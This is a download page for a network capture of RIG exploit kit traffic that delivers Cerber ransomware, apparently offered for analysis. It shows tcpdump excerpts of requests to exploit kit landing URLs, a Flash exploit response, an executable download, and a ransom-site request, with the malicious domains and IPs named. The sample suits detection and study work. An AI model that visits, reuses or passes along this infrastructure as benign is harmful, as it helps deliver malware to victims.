Text Example

PSEUDO-DARKLEECH RIG EK Exploit Kit Delivers Cerber Ransomware PCAP file Download

Download Attachments

  • 1 pcap 22
    Date added: May 24, 2019 12:02 am Added by: admin File size: 772 KB Downloads: 37

2016-12-11 16:42:13.907878 IP 10.12.10.101.49182 > 195.133.48.182.80: Flags [P.], seq 1489:2173, ack 21396, win 63936, length 684: HTTP: GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&
ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
E…..@…..
.
e..0….P.:..”..;P…….GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://acc.xrossflex.com/?sourceid=yandex&q=znvQMvXcJwDQDoDGMvrESLtEMU7QA0KK2OH_76uyEoH9JHT1vrfUSkrtt&aqs=yandex.100l87.406n0h1&ie=Windows-1
x-flash-version: 11,7,700,232
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com
Connection: Keep-Alive

2016-12-11 16:42:14.617380 IP 195.133.48.182.80 > 10.12.10.101.49182: Flags [P.], seq 21396:22747, ack 2173, win 64240, length 1351: HTTP: HTTP/1.1 200 OK
E..o.’….)…0.
.
e.P..”..;.:./P….l..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:01 GMT
Content-Length: 13529
Content-Type: application/x-shockwave-flash
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive


.2016-12-11 16:42:16.868147 IP 10.12.10.101.49185 > 195.133.48.182.80: Flags [P.], seq 1:443, ack 1, win 64240, length 442: HTTP: GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
E…..@…..
.
e..0..!.P….LD..P….N..GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
Connection: Keep-Alive
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com

2016-12-11 16:42:16.868305 IP 195.133.48.182.80 > 10.12.10.101.49185: Flags [.], ack 443, win 64240, length 0
E..(.7……..0.
.
e.P.!LD……P…UQ……..
2016-12-11 16:42:17.538090 IP 195.133.48.182.80 > 10.12.10.101.49183: Flags [.], seq 1:1461, ack 433, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E….:….)6..0.
.
e.P…d..6 ..P…N…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:03 GMT
Accept-Ranges: bytes
Content-Length: 276726
Content-Type: application/x-msdownload
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive

e.E…#.P1.w..p.P…………. 2016-12-11 16:44:08.514628 IP 10.12.10.101.49187 > 185.69.153.226.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342: HTTP: GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1 E..~ .@….. . e.E…#.P1.w..p.P…;…GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1
Accept: /
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ffoqr3ug7m726zou.uld7hk.top
Connection: Keep-Alive

Leave a Reply